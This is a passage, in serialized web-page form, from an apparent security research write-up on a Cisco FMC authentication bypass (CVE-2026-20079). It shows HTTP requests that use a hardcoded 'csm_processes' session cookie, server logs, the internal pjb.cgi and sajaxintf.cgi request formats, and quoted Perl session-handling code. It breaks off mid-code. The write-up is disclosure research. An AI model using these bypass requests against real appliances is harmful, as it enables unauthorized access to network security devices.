\n",[886,6341,6342,6357,6367,6377,6387,6397,6407,6417,6427,6437,6447,6457,6467,6477,6487,6497,6507,6516,6521],{"__ignoreMap":219},[1373,6343,6344,6346,6348,6351,6354],{"class":1375,"line":1376},[1373,6345,6290],{"class":5387},[1373,6347,2180],{"class":4640},[1373,6349,6350],{"class":5467},"1.1",[1373,6352,6353],{"class":5467}," 302",[1373,6355,6356],{"class":1391}," Found\n",[1373,6358,6359,6362,6364],{"class":1375,"line":220},[1373,6360,6361],{"class":6300},"Date",[1373,6363,4606],{"class":5387},[1373,6365,6366],{"class":1391}," Wed, 25 Mar 2026 19:30:07 GMT\n",[1373,6368,6369,6372,6374],{"class":1375,"line":1266},[1373,6370,6371],{"class":6300},"Server",[1373,6373,4606],{"class":5387},[1373,6375,6376],{"class":1391}," Mojolicious (Perl)\n",[1373,6378,6379,6382,6384],{"class":1375,"line":1852},[1373,6380,6381],{"class":6300},"Strict-Transport-Security",[1373,6383,4606],{"class":5387},[1373,6385,6386],{"class":1391}," max-age=31536000; includeSubDomains\n",[1373,6388,6389,6392,6394],{"class":1375,"line":4692},[1373,6390,6391],{"class":6300},"Content-Type",[1373,6393,4606],{"class":5387},[1373,6395,6396],{"class":1391}," text\u002Fplain; charset=utf-8\n",[1373,6398,6399,6402,6404],{"class":1375,"line":4724},[1373,6400,6401],{"class":6300},"Location",[1373,6403,4606],{"class":5387},[1373,6405,6406],{"class":1391}," \u002Fui\u002Flogin?target=%2Fmojo-async%2Fhelp%2Fabout.cgi\n",[1373,6408,6409,6412,6414],{"class":1375,"line":4756},[1373,6410,6411],{"class":6300},"Content-Length",[1373,6413,4606],{"class":5387},[1373,6415,6416],{"class":1391}," 19\n",[1373,6418,6419,6422,6424],{"class":1375,"line":4768},[1373,6420,6421],{"class":6300},"Cache-Control",[1373,6423,4606],{"class":5387},[1373,6425,6426],{"class":1391}," no-store\n",[1373,6428,6429,6432,6434],{"class":1375,"line":4792},[1373,6430,6431],{"class":6300},"X-Frame-Options",[1373,6433,4606],{"class":5387},[1373,6435,6436],{"class":1391}," SAMEORIGIN\n",[1373,6438,6439,6442,6444],{"class":1375,"line":4798},[1373,6440,6441],{"class":6300},"X-UA-Compatible",[1373,6443,4606],{"class":5387},[1373,6445,6446],{"class":1391}," IE=edge\n",[1373,6448,6449,6452,6454],{"class":1375,"line":4806},[1373,6450,6451],{"class":6300},"X-Permitted-Cross-Domain-Policies",[1373,6453,4606],{"class":5387},[1373,6455,6456],{"class":1391}," none\n",[1373,6458,6459,6462,6464],{"class":1375,"line":4817},[1373,6460,6461],{"class":6300},"X-XSS-Protection",[1373,6463,4606],{"class":5387},[1373,6465,6466],{"class":1391}," 1; mode=block\n",[1373,6468,6469,6472,6474],{"class":1375,"line":4825},[1373,6470,6471],{"class":6300},"Referrer-Policy",[1373,6473,4606],{"class":5387},[1373,6475,6476],{"class":1391}," same-origin\n",[1373,6478,6479,6482,6484],{"class":1375,"line":4835},[1373,6480,6481],{"class":6300},"Content-Security-Policy",[1373,6483,4606],{"class":5387},[1373,6485,6486],{"class":1391}," base-uri 'self'; frame-ancestors 'self'\n",[1373,6488,6489,6492,6494],{"class":1375,"line":4843},[1373,6490,6491],{"class":6300},"X-Content-Type-Options",[1373,6493,4606],{"class":5387},[1373,6495,6496],{"class":1391}," nosniff\n",[1373,6498,6499,6502,6504],{"class":1375,"line":4849},[1373,6500,6501],{"class":6300},"Keep-Alive",[1373,6503,4606],{"class":5387},[1373,6505,6506],{"class":1391}," timeout=5, max=100\n",[1373,6508,6509,6511,6513],{"class":1375,"line":4877},[1373,6510,6331],{"class":6300},[1373,6512,4606],{"class":5387},[1373,6514,6515],{"class":1391}," Keep-Alive\n",[1373,6517,6518],{"class":1375,"line":4915},[1373,6519,6520],{"emptyLinePlaceholder":237},"\n",[1373,6522,6523],{"class":1375,"line":4931},[1373,6524,6525],{"class":4640},"Invalid session ID\n",[18,6527,6528,6529,6531,6532,6535],{},"But, with our special ",[886,6530,4442],{}," session ID, we reach the page and get a HTTP ",[886,6533,6534],{},"200"," response, and the system data renders:",[1354,6537,6539],{"className":6275,"code":6538,"language":6277,"meta":219,"style":219},"GET \u002Fhelp\u002Fabout.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n\n",[886,6540,6541,6553,6561,6571,6579,6587],{"__ignoreMap":219},[1373,6542,6543,6545,6547,6549,6551],{"class":1375,"line":1376},[1373,6544,6284],{"class":4636},[1373,6546,6287],{"class":4640},[1373,6548,6290],{"class":5387},[1373,6550,2180],{"class":4640},[1373,6552,6295],{"class":5467},[1373,6554,6555,6557,6559],{"class":1375,"line":220},[1373,6556,6301],{"class":6300},[1373,6558,4606],{"class":5387},[1373,6560,6306],{"class":1391},[1373,6562,6563,6566,6568],{"class":1375,"line":1266},[1373,6564,6565],{"class":6300},"Cookie",[1373,6567,4606],{"class":5387},[1373,6569,6570],{"class":1391}," CGISESSID=csm_processes\n",[1373,6572,6573,6575,6577],{"class":1375,"line":1852},[1373,6574,6311],{"class":6300},[1373,6576,4606],{"class":5387},[1373,6578,6316],{"class":1391},[1373,6580,6581,6583,6585],{"class":1375,"line":4692},[1373,6582,6321],{"class":6300},[1373,6584,4606],{"class":5387},[1373,6586,6326],{"class":1391},[1373,6588,6589,6591,6593],{"class":1375,"line":4724},[1373,6590,6331],{"class":6300},[1373,6592,4606],{"class":5387},[1373,6594,6336],{"class":1391},[1354,6596,6598],{"className":6275,"code":6597,"language":6277,"meta":219,"style":219},"HTTP\u002F1.1 200 OK\nDate: Wed, 25 Mar 2026 19:28:23 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nVary: Accept-Encoding\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nContent-Length: 25555\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text\u002Fhtml; charset=utf-8\n\n\u003C!DOCTYPE html>\n\n\n\n...snip...\n",[886,6599,6600,6614,6623,6631,6639,6649,6657,6665,6673,6681,6689,6697,6705,6713,6722,6730,6738,6747,6751,6766,6770,6774,6779],{"__ignoreMap":219},[1373,6601,6602,6604,6606,6608,6611],{"class":1375,"line":1376},[1373,6603,6290],{"class":5387},[1373,6605,2180],{"class":4640},[1373,6607,6350],{"class":5467},[1373,6609,6610],{"class":5467}," 200",[1373,6612,6613],{"class":1391}," OK\n",[1373,6615,6616,6618,6620],{"class":1375,"line":220},[1373,6617,6361],{"class":6300},[1373,6619,4606],{"class":5387},[1373,6621,6622],{"class":1391}," Wed, 25 Mar 2026 19:28:23 GMT\n",[1373,6624,6625,6627,6629],{"class":1375,"line":1266},[1373,6626,6371],{"class":6300},[1373,6628,4606],{"class":5387},[1373,6630,6376],{"class":1391},[1373,6632,6633,6635,6637],{"class":1375,"line":1852},[1373,6634,6381],{"class":6300},[1373,6636,4606],{"class":5387},[1373,6638,6386],{"class":1391},[1373,6640,6641,6644,6646],{"class":1375,"line":4692},[1373,6642,6643],{"class":6300},"Vary",[1373,6645,4606],{"class":5387},[1373,6647,6648],{"class":1391}," Accept-Encoding\n",[1373,6650,6651,6653,6655],{"class":1375,"line":4724},[1373,6652,6421],{"class":6300},[1373,6654,4606],{"class":5387},[1373,6656,6426],{"class":1391},[1373,6658,6659,6661,6663],{"class":1375,"line":4756},[1373,6660,6431],{"class":6300},[1373,6662,4606],{"class":5387},[1373,6664,6436],{"class":1391},[1373,6666,6667,6669,6671],{"class":1375,"line":4768},[1373,6668,6441],{"class":6300},[1373,6670,4606],{"class":5387},[1373,6672,6446],{"class":1391},[1373,6674,6675,6677,6679],{"class":1375,"line":4792},[1373,6676,6451],{"class":6300},[1373,6678,4606],{"class":5387},[1373,6680,6456],{"class":1391},[1373,6682,6683,6685,6687],{"class":1375,"line":4798},[1373,6684,6461],{"class":6300},[1373,6686,4606],{"class":5387},[1373,6688,6466],{"class":1391},[1373,6690,6691,6693,6695],{"class":1375,"line":4806},[1373,6692,6471],{"class":6300},[1373,6694,4606],{"class":5387},[1373,6696,6476],{"class":1391},[1373,6698,6699,6701,6703],{"class":1375,"line":4817},[1373,6700,6481],{"class":6300},[1373,6702,4606],{"class":5387},[1373,6704,6486],{"class":1391},[1373,6706,6707,6709,6711],{"class":1375,"line":4825},[1373,6708,6491],{"class":6300},[1373,6710,4606],{"class":5387},[1373,6712,6496],{"class":1391},[1373,6714,6715,6717,6719],{"class":1375,"line":4835},[1373,6716,6411],{"class":6300},[1373,6718,4606],{"class":5387},[1373,6720,6721],{"class":1391}," 25555\n",[1373,6723,6724,6726,6728],{"class":1375,"line":4843},[1373,6725,6501],{"class":6300},[1373,6727,4606],{"class":5387},[1373,6729,6506],{"class":1391},[1373,6731,6732,6734,6736],{"class":1375,"line":4849},[1373,6733,6331],{"class":6300},[1373,6735,4606],{"class":5387},[1373,6737,6515],{"class":1391},[1373,6739,6740,6742,6744],{"class":1375,"line":4877},[1373,6741,6391],{"class":6300},[1373,6743,4606],{"class":5387},[1373,6745,6746],{"class":1391}," text\u002Fhtml; charset=utf-8\n",[1373,6748,6749],{"class":1375,"line":4915},[1373,6750,6520],{"emptyLinePlaceholder":237},[1373,6752,6753,6756,6759,6763],{"class":1375,"line":4931},[1373,6754,6755],{"class":1383},"\u003C!",[1373,6757,6758],{"class":5387},"DOCTYPE",[1373,6760,6762],{"class":6761},"sSsL9"," html",[1373,6764,6765],{"class":1383},">\n",[1373,6767,6768],{"class":1375,"line":4947},[1373,6769,6520],{"emptyLinePlaceholder":237},[1373,6771,6772],{"class":1375,"line":4952},[1373,6773,6520],{"emptyLinePlaceholder":237},[1373,6775,6777],{"class":1375,"line":6776},22,[1373,6778,6520],{"emptyLinePlaceholder":237},[1373,6780,6782],{"class":1375,"line":6781},23,[1373,6783,6784],{"class":4640},"...snip...\n",[18,6786,6787],{},[68,6788],{"alt":6789,"src":6790},"Authentication bypass for the auth dialogue.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fhelp-dialog.png",[18,6792,6793],{},"Sweet! It appears we found the issue, and it looks to be as easy as using a hardcoded session. Now we can just set our cookie to that value and try and reach any of the pages.... and every page functionally triggers the following error:",[18,6795,6796],{},[68,6797],{"alt":6798,"src":6799},"Authentication failing on most pages.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fui-failure.png",[61,6801,6803],{"id":6802},"its-never-that-easy","It's Never That Easy",[18,6805,6806],{},"Using the hardcoded session and reaching for any of the endpoints triggers errors in the log similar to the following:",[1354,6808,6811],{"className":6809,"code":6810,"language":1359},[1357],"[2026-03-25 19:41:00.32860] [14601] [debug] 200 OK (2.203898s, 0.454\u002Fs)\n[2026-03-25 19:41:00.32865] [14601] [debug] after dispatch worker inspection\n[2026-03-25 19:41:46.03099] [14601] [debug] Resetting modules...\n[2026-03-25 19:41:46.03807] [14601] [debug] Module reset complete\n[2026-03-25 19:41:46.03828] [14601] [debug] GET \"\u002Fplatinum\u002FApplianceInformation.cgi\" (27828f1b)\n[2026-03-25 19:41:46.03841] [14601] [debug] Routing to controller \"SF::Mojo::Handlers::ApplianceInformationHandler\" and action \"mojo_handler\"\n[2026-03-25 19:41:46.03895] [14601] [info] handle_auth: Trying to connect to \u002Fplatinum\u002FApplianceInformation.cgi\n[2026-03-25 19:41:46.04650] [14601] [info] User [csm_processes] does not have page permission [configuration]. Access denied. at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 3268.\n[2026-03-25 19:41:46.04675] [14601] [info] Unauthorized access to \u002Fplatinum\u002FApplianceInformation.cgi\n called from SF::Util::Stacktrace::ToString at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FCommonUtils.pm, line 119\n called from SF::Mojo::CommonUtils::Unauthorized at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FCommonUtils.pm, line 266\n called from SF::Mojo::CommonUtils::handle_auth at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FMojo\u002FHandlers\u002FApplianceInformationHandler.pm, line 19\n...snip...\n called from Mojo::Server::Prefork::_spawn at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FPrefork.pm, line 100\n called from Mojo::Server::Prefork::_manage at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FPrefork.pm, line 85\n called from Mojo::Server::Prefork::run at \u002Fusr\u002Flib64\u002Fperl5\u002Fsite_perl\u002F5.34.1\u002FMojo\u002FServer\u002FHypnotoad.pm, line 74\n called from Mojo::Server::Hypnotoad::run at \u002Fusr\u002Flocal\u002Fsf\u002Fbin\u002Fmojo_server_wrapper.pl, line 38\n[2026-03-25 19:41:46.04803] [14601] [info] Use of uninitialized value $key in concatenation (.) or string at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:46.04806] [14601] [info] getSFActionID: \u003C> **************************************************** at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.04822] [14601] [info] Use of uninitialized value $key in concatenation (.) or string at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.04829] [14601] [info] getSFActionID: \u003C> **************************************************** at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm line 4217.\n[2026-03-25 19:41:48.21809] [14601] [info] Use of uninitialized value in string eq at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAmplitude.pm line 40.\n[2026-03-25 19:41:48.22680] [14601] [debug] 200 OK (2.188507s, 0.457\u002Fs)\n[2026-03-25 19:41:48.22691] [14601] [debug] after dispatch worker inspection\n",[886,6812,6810],{"__ignoreMap":219},[18,6814,6815],{},"As it turns out, nearly every CGI page of the application contains a snippet similar to the following:",[1354,6817,6819],{"className":4621,"code":6818,"language":4623,"meta":219,"style":219},"use SF::Auth;\nmy $session = SF::Auth::GetSession($cgi);\nSF::Auth::CheckLogin($cgi, $session);\n",[886,6820,6821,6828,6843],{"__ignoreMap":219},[1373,6822,6823,6825],{"class":1375,"line":1376},[1373,6824,4976],{"class":4636},[1373,6826,6827],{"class":4640}," SF::Auth;\n",[1373,6829,6830,6833,6835,6838,6840],{"class":1375,"line":220},[1373,6831,6832],{"class":4652},"my",[1373,6834,4656],{"class":1383},[1373,6836,6837],{"class":4640},"session = SF::Auth::GetSession(",[1373,6839,4644],{"class":1383},[1373,6841,6842],{"class":4640},"cgi);\n",[1373,6844,6845,6848,6850,6853,6855],{"class":1375,"line":1266},[1373,6846,6847],{"class":4640},"SF::Auth::CheckLogin(",[1373,6849,4644],{"class":1383},[1373,6851,6852],{"class":4640},"cgi, ",[1373,6854,4644],{"class":1383},[1373,6856,4944],{"class":4640},[18,6858,6859,6860,6863,6864,6867,6868,6871,6872,6875,6876,6878,6879,6882],{},"Internally to the application, the current session username is cross-referenced with the permission logic ",[886,6861,6862],{},"Permission.pm"," module, and uses the permissions assigned to the user for whenever ",[886,6865,6866],{},"CheckLogin"," is run. This means we can pass the basic authentication check for any page that only uses ",[886,6869,6870],{},"SF::Auth::GetSession",", but any calls to ",[886,6873,6874],{},"SF::Auth::CheckLogin"," or a direct permission check will have to have permissions of the user. Well what does our ",[886,6877,4442],{}," user permission have? None. Turns out the machine user does ",[1131,6880,6881],{},"not"," have any permissions assigned, and we are functionally restricted to the lowest-privileged user account.",[18,6884,6885],{},"This immediately presented a huge problem, as we generally could not interact with any of the APIs or CGI scripts (with very few exceptions). We began to attempt to check authentication logic for a few set of entry points, testing as many as we could find and cross-referencing what a normal admin UI user would be able to interact with.",[18,6887,6888,6889,6892],{},"Testing showed that we only had access to a small handful of API calls that checked session validity, a few CGI scripts, and not a single one of the ",[886,6890,6891],{},"\u002Fapi"," routes in Apache. We got stuck here for quite a while attempting to find what we could access with our minimally privileged user, as the words \"successful exploit could allow the attacker to execute a variety of scripts and commands that allow root access to the device\" echoed in our heads.",[18,6894,6895,6896,6898,6899,6901],{},"Our UI login testing and cross referencing with the ",[886,6897,4442],{}," session showed a couple of exceptions to the ",[886,6900,6866],{}," logic that stood out:",[22,6903,6904,6917],{},[25,6905,2245,6906,6908,6909,6912,6913,6916],{},[886,6907,4491],{}," script that appears to be used for bulk API requests does not directly check logins, only sessions; but then it cross-references the permissions that are callable with a set of permission maps to functions defined in ",[886,6910,6911],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FPJB.pm",". This includes a special ",[886,6914,6915],{},"all"," permission.",[25,6918,2245,6919,6922,6923,6926],{},[886,6920,6921],{},"sajaxintf.cgi"," script handles async AJAX requests; it has a set of functions that any user appears to be able to call, and that correlate to functions defined in ",[886,6924,6925],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FSajaxIntf.pm"," that individually appear to perform most of their logic.",[18,6928,6929,6930,6932,6933,6936],{},"Great, those sound like perfect candidates, but both of these APIs have odd interfaces. For ",[886,6931,6921],{},", requests are sent as a JSON array, and the ordered arguments correlate to the application functions and their arguments. The following call sends a request to the ",[886,6934,6935],{},"batchResults"," function. All the following parameters are arguments for that function:",[1354,6938,6940],{"className":6275,"code":6939,"language":6277,"meta":219,"style":219},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772847841952 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=199ceac425aaa91610edd959ce049568\nContent-Length: 143\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nConnection: keep-alive\n\n[\"a490cd6e67ccde81d131684846d7a13c\",\"batchResults\",null,10000,\"getRulesForCategory\",\"policy_modifications\",\"\",\"\",\"Category::browser-chrome\",\"\"]\n",[886,6941,6942,6956,6964,6973,6982,6992,7001,7009,7019,7027,7031],{"__ignoreMap":219},[1373,6943,6944,6947,6950,6952,6954],{"class":1375,"line":1376},[1373,6945,6946],{"class":4636},"POST",[1373,6948,6949],{"class":4640}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772847841952 ",[1373,6951,6290],{"class":5387},[1373,6953,2180],{"class":4640},[1373,6955,6295],{"class":5467},[1373,6957,6958,6960,6962],{"class":1375,"line":220},[1373,6959,6301],{"class":6300},[1373,6961,4606],{"class":5387},[1373,6963,6306],{"class":1391},[1373,6965,6966,6968,6970],{"class":1375,"line":1266},[1373,6967,6565],{"class":6300},[1373,6969,4606],{"class":5387},[1373,6971,6972],{"class":1391}," CGISESSID=199ceac425aaa91610edd959ce049568\n",[1373,6974,6975,6977,6979],{"class":1375,"line":1852},[1373,6976,6411],{"class":6300},[1373,6978,4606],{"class":5387},[1373,6980,6981],{"class":1391}," 143\n",[1373,6983,6984,6987,6989],{"class":1375,"line":4692},[1373,6985,6986],{"class":6300},"Accept-Language",[1373,6988,4606],{"class":5387},[1373,6990,6991],{"class":1391}," en-US,en;q=0.9\n",[1373,6993,6994,6996,6998],{"class":1375,"line":4724},[1373,6995,6391],{"class":6300},[1373,6997,4606],{"class":5387},[1373,6999,7000],{"class":1391}," application\u002Fjson\n",[1373,7002,7003,7005,7007],{"class":1375,"line":4756},[1373,7004,6311],{"class":6300},[1373,7006,4606],{"class":5387},[1373,7008,6316],{"class":1391},[1373,7010,7011,7014,7016],{"class":1375,"line":4768},[1373,7012,7013],{"class":6300},"Accept",[1373,7015,4606],{"class":5387},[1373,7017,7018],{"class":1391}," *\u002F*\n",[1373,7020,7021,7023,7025],{"class":1375,"line":4792},[1373,7022,6331],{"class":6300},[1373,7024,4606],{"class":5387},[1373,7026,6336],{"class":1391},[1373,7028,7029],{"class":1375,"line":4798},[1373,7030,6520],{"emptyLinePlaceholder":237},[1373,7032,7033,7036,7038,7040,7042,7044,7046,7048,7050,7052,7056,7058,7061,7063,7065,7068,7070,7072,7074,7077,7079,7081,7084,7086,7088,7090,7092,7095,7097,7099,7101],{"class":1375,"line":4806},[1373,7034,7035],{"class":1383},"[",[1373,7037,183],{"class":1387},[1373,7039,5731],{"class":1391},[1373,7041,183],{"class":1387},[1373,7043,5437],{"class":1383},[1373,7045,183],{"class":1387},[1373,7047,6935],{"class":1391},[1373,7049,183],{"class":1387},[1373,7051,5437],{"class":1383},[1373,7053,7055],{"class":7054},"sMTiH","null",[1373,7057,5437],{"class":1383},[1373,7059,7060],{"class":5467},"10000",[1373,7062,5437],{"class":1383},[1373,7064,183],{"class":1387},[1373,7066,7067],{"class":1391},"getRulesForCategory",[1373,7069,183],{"class":1387},[1373,7071,5437],{"class":1383},[1373,7073,183],{"class":1387},[1373,7075,7076],{"class":1391},"policy_modifications",[1373,7078,183],{"class":1387},[1373,7080,5437],{"class":1383},[1373,7082,7083],{"class":1387},"\"\"",[1373,7085,5437],{"class":1383},[1373,7087,7083],{"class":1387},[1373,7089,5437],{"class":1383},[1373,7091,183],{"class":1387},[1373,7093,7094],{"class":1391},"Category::browser-chrome",[1373,7096,183],{"class":1387},[1373,7098,5437],{"class":1383},[1373,7100,7083],{"class":1387},[1373,7102,7103],{"class":1383},"]\n",[18,7105,7106,7107,7109,7110,7113,7114,7117,7118,7121,7122,7125],{},"Meanwhile, the ",[886,7108,4491],{}," script has a similar interface, but instead uses form value fields and a ",[886,7111,7112],{},"parameter"," field that contains the JSON array field that corresponds to a Perl object. In the following example the ",[886,7115,7116],{},"SF::IdentityPolicy::IdentityPolicy::getPolicyList"," function is called and ",[886,7119,7120],{},"parameters"," is an encoded empty JSON array (",[886,7123,7124],{},"[]",") indicating no arguments are passed:",[1354,7127,7129],{"className":6275,"code":7128,"language":6277,"meta":219,"style":219},"POST \u002Fpjb.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=199ceac425aaa91610edd959ce049568\nContent-Length: 177\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\nConnection: keep-alive\n\n&function=SF::IdentityPolicy::IdentityPolicy::getPolicyList¶meters=%5B%5D&get_all_errors=1&sf_action_id=a490cd6e67ccde81d131684846d7a13c&ss=IdentityPolicyList&am=Page%20View\n",[886,7130,7131,7144,7152,7160,7169,7177,7186,7194,7202,7210,7214],{"__ignoreMap":219},[1373,7132,7133,7135,7138,7140,7142],{"class":1375,"line":1376},[1373,7134,6946],{"class":4636},[1373,7136,7137],{"class":4640}," \u002Fpjb.cgi ",[1373,7139,6290],{"class":5387},[1373,7141,2180],{"class":4640},[1373,7143,6295],{"class":5467},[1373,7145,7146,7148,7150],{"class":1375,"line":220},[1373,7147,6301],{"class":6300},[1373,7149,4606],{"class":5387},[1373,7151,6306],{"class":1391},[1373,7153,7154,7156,7158],{"class":1375,"line":1266},[1373,7155,6565],{"class":6300},[1373,7157,4606],{"class":5387},[1373,7159,6972],{"class":1391},[1373,7161,7162,7164,7166],{"class":1375,"line":1852},[1373,7163,6411],{"class":6300},[1373,7165,4606],{"class":5387},[1373,7167,7168],{"class":1391}," 177\n",[1373,7170,7171,7173,7175],{"class":1375,"line":4692},[1373,7172,6986],{"class":6300},[1373,7174,4606],{"class":5387},[1373,7176,6991],{"class":1391},[1373,7178,7179,7181,7183],{"class":1375,"line":4724},[1373,7180,6391],{"class":6300},[1373,7182,4606],{"class":5387},[1373,7184,7185],{"class":1391}," application\u002Fx-www-form-urlencoded\n",[1373,7187,7188,7190,7192],{"class":1375,"line":4756},[1373,7189,6311],{"class":6300},[1373,7191,4606],{"class":5387},[1373,7193,6316],{"class":1391},[1373,7195,7196,7198,7200],{"class":1375,"line":4768},[1373,7197,7013],{"class":6300},[1373,7199,4606],{"class":5387},[1373,7201,7018],{"class":1391},[1373,7203,7204,7206,7208],{"class":1375,"line":4792},[1373,7205,6331],{"class":6300},[1373,7207,4606],{"class":5387},[1373,7209,6336],{"class":1391},[1373,7211,7212],{"class":1375,"line":4798},[1373,7213,6520],{"emptyLinePlaceholder":237},[1373,7215,7216,7219,7222],{"class":1375,"line":4806},[1373,7217,7218],{"class":1397},"&",[1373,7220,7221],{"class":4640},"function=",[1373,7223,7224],{"class":1391},"SF::IdentityPolicy::IdentityPolicy::getPolicyList¶meters=%5B%5D&get_all_errors=1&sf_action_id=a490cd6e67ccde81d131684846d7a13c&ss=IdentityPolicyList&am=Page%20View\n",[18,7226,7227,7228,7230,7231,7233,7234,7236,7237,7239,7240,7242,7243,7245],{},"As you may have noticed, both requests contain the value ",[886,7229,5731],{},", the first in the first array parameter and the second in the ",[886,7232,4468],{}," parameter. This is where the next hurdle comes into play, because this value acts as a CSRF token that is tied to user sessions. Looking at the original startup-created session SQL response, we see that the ",[886,7235,5800],{}," user session has the ",[886,7238,4468],{}," value set, and the ",[886,7241,4442],{}," session does not. This means that if we make a request to those endpoints, we will not be able to pass any of the basic validation checks, because that session does not have the ",[886,7244,4468],{}," value set. This results in the inability to call any of the functions in these applications and also causes almost all API calls to fail uniformly. These also correlate directly to the session value so are not reusable between user sessions.",[18,7247,7248,7249,7251],{},"We need to get a ",[886,7250,4468],{}," or a permission upgrade to be able to functionally do anything beyond version checking.",[61,7253,7255],{"id":7254},"session-upgrade","Session Upgrade",[18,7257,7258,7259,7262,7263,7265,7266,7268,7269,7271,7272,7274],{},"Our first thought was to look at all the session value manipulations and any interactions with permissions, which turned out to be a dead end: In our testing, there were almost no session manipulations that could occur unauthenticated. Our second idea was to look at other APIs and reverse ",[886,7260,7261],{},"auth-daemon"," for any interactions. Midway through that long process and many failed sinks, something occurred to me. The ",[886,7264,4442],{}," session value isn't inherently tied to the ",[886,7267,4442],{}," authentication. According to the ",[886,7270,4965],{}," code, an authentication to the login page would happily take an existing session value and make a new session for the user — ",[1131,7273,297],{}," it would happily initialize a set of options on the existing session:",[1354,7276,7278],{"className":4621,"code":7277,"language":4623,"meta":219,"style":219},"my $authing = 0;\nsub GetSession {\n my ($q, $silent) = @_;\n #warn \"Get Session not silent: \".SF::Util::Stacktrace::ToString() if (!$silent);\n\n # Return the cached session if we have one\n return $_SESSION if (defined $_SESSION);\n\n $q = new SF if !defined $q;\n\n # If they were fishing for a cached session but there isn't one, return no session\n my $sid;\n if (ref($q) eq 'Mojo::Message::Request') {\n $sid = find_session_id_from_cookies($q->cookies);\n } else {\n # Get the session ID from the cookie\n $sid = $q->cookie($CGI::Session::NAME);\n }\n return undef if !defined $sid;\n\n # Initialize sfclient\n return undef if (sfclient::sfclient_Init() != 0);\n\n # Cache the session and return it\n $_SESSION = MakeSession($sid, $silent);\n if (ref($q) eq 'Mojo::Message::Request') {\n $CURRENT_REQ_URL = $q->url->path->to_string;\n $CURRENT_REQ_METHOD = $q->method;\n setCurrentReqParams($q->params->to_hash);\n }\n else {\n $CURRENT_REQ_URL = $q->url( -absolute => 1);\n $CURRENT_REQ_METHOD = $q->request_method;\n setCurrentReqParams(scalar $q->Vars());\n }\n return $_SESSION;\n}\n",[886,7279,7280,7289,7301,7322,7327,7331,7336,7354,7358,7378,7382,7387,7396,7420,7436,7444,7449,7470,7474,7492,7496,7501,7518,7522,7528,7544,7569,7596,7613,7633,7638,7646,7670,7686,7707,7712,7720],{"__ignoreMap":219},[1373,7281,7282,7284,7286],{"class":1375,"line":1376},[1373,7283,6832],{"class":4652},[1373,7285,4656],{"class":1383},[1373,7287,7288],{"class":4640},"authing = 0;\n",[1373,7290,7291,7295,7299],{"class":1375,"line":220},[1373,7292,7294],{"class":7293},"srJo8","sub",[1373,7296,7298],{"class":7297},"sD0ED"," GetSession",[1373,7300,4765],{"class":4640},[1373,7302,7303,7305,7307,7309,7311,7313,7316,7319],{"class":1375,"line":1266},[1373,7304,4653],{"class":4652},[1373,7306,4641],{"class":4640},[1373,7308,4644],{"class":1383},[1373,7310,4939],{"class":4640},[1373,7312,4644],{"class":1383},[1373,7314,7315],{"class":4640},"silent) = ",[1373,7317,7318],{"class":1383},"@",[1373,7320,7321],{"class":4640},"_;\n",[1373,7323,7324],{"class":1375,"line":1852},[1373,7325,7326],{"class":4630}," #warn \"Get Session not silent: \".SF::Util::Stacktrace::ToString() if (!$silent);\n",[1373,7328,7329],{"class":1375,"line":4692},[1373,7330,6520],{"emptyLinePlaceholder":237},[1373,7332,7333],{"class":1375,"line":4724},[1373,7334,7335],{"class":4630}," # Return the cached session if we have one\n",[1373,7337,7338,7341,7344,7346,7348,7351],{"class":1375,"line":4756},[1373,7339,7340],{"class":4636}," 